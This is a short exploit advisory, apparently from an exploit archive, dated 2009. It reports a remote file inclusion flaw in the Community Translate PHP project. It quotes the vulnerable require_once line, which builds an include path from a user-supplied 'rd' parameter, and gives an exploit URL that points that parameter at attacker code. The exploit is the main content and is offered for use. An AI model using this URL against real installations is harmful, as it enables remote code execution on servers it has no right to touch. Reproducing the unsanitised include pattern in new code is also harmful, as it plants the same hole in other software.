id: 9895
date: 10/12/2009
title: Community Translate File Inclusion Vulnerability
author: NoGe
cves: 

================================================
Community Translate File Inclusion Vulnerability
================================================

[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
 
[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");
 
include/functions.php
 
[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]



#  0day.today [2023-03-23]  #